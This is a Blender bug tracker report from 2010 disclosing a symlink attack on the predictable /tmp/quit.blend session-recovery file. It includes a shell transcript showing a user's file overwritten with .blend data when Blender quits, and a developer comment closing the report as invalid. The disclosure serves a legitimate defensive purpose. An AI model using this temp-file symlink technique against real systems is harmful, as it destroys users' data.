Home

possible symlink attack in blender 2.5
Closed, InvalidPublic

Description
Blender is subject to symlink attack when the user closes the app without saving their changes. The consequences are that an attacker determined file owned by the victim is overwritten with a .blend file, destroying whatever data was in the file in the process.

Version 2.49.2 isn't vulnerable to this attack since it uses ~/.blender/quit.blend instead of /tmp/quit.blend. I would suggest this behaviour be restored before Blender 2.5 is released.

pabs@chianamo:~$ sudo ln -s /home/pabs/foo /tmp/quit.blend
[sudo] password for pabs:
pabs@chianamo:~$ ls -l /tmp/quit.blend /home/pabs/foo
ls: cannot access /home/pabs/foo: No such file or directory
lrwxrwxrwx 1 root root 14 Jun 5 13:51 /tmp/quit.blend -> /home/pabs/foo
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/fooo: ERROR: cannot open `/home/pabs/foo' (No such file or directory)
pabs@chianamo:~$ blender
Ob 'Camera' - Successfully removed 0 keyframes
*bpy stats* - tot exec: 5728, tot run: 0.4375sec, average run: 0.000076sec, tot usage 1.4299%
Saved session recovery to /tmp/quit.blend

Blender quit
pabs@chianamo:~$ ls -l /tmp/quit.blend /home/pabs/foo
-rw-r----- 1 pabs pabs 78K Jun 5 13:53 /home/pabs/foo
lrwxrwxrwx 1 root root 14 Jun 5 13:51 /tmp/quit.blend -> /home/pabs/foo
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo: Blender3D, saved as 64-bits little endian with version 2.50.0007
pabs@chianamo:~$ echo foo > /home/pabs/foo
pabs@chianamo:~$ ls -l /tmp/quit.blend /home/pabs/foo
-rw-r----- 1 pabs pabs 4 Jun 5 14:00 /home/pabs/foo
lrwxrwxrwx 1 root root 14 Jun 5 13:51 /tmp/quit.blend -> /home/pabs/foo
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo: ASCII text
pabs@chianamo:~$ blender
*bpy stats* - tot exec: 648, tot run: 0.0677sec, average run: 0.000104sec, tot usage 0.4556%
Saved session recovery to /tmp/quit.blend

Blender quit
pabs@chianamo:~$ file /tmp/quit.blend /home/pabs/foo
/tmp/quit.blend: symbolic link to `/home/pabs/foo'
/home/pabs/foo: Blender3D, saved as 64-bits little endian with version 2.50.0007
pabs (Paul Wise) set Type to Bug.Via Old WorldJun 5 2010, 8:25 AM
broken (Matt Ebb) added a comment.Via Old WorldJun 7 2010, 10:13 AM
Hi, revision of the way blender finds directory/file paths for these kinds of resource files is currently in development, and will allow customisation of these with environment variables. Technically this functionality is doing what it is designed to do, so it's not really a bug (there are many more 'security' issues in blender than this).

Incidentally, I'm not sure why 2.49 was saving in ~/.blender/ for you, afaik it has always saved in /tmp, perhaps you didn't have write access there or something.

Closing this report, thanks.
broken (Matt Ebb) closed this task as "Invalid".Via Old WorldJun 7 2010, 10:13 AM
pabs (Paul Wise) added a comment.Via Old WorldJun 7 2010, 10:33 AM
According to the Debian maintainer, 2.49 was patched in Debian to save into the right directories and avoid the security issues but the 2.50 version in Debian experimental dropped those patches:

http://bugs.debian.org/584621
http://git.debian.org/?p=collab-maint/blender.git;a=blob;f=debian/NEWS;hb=experimental

In any case, it is a shame that the blender project isn't interested in fixing security issues, no matter how minor they might seem.
pabs (Paul Wise) added a comment.Via Old WorldSep 5 2012, 4:39 PM
This bug is still present in blender 2.63a, it would be great if it were fixed.

Add Comment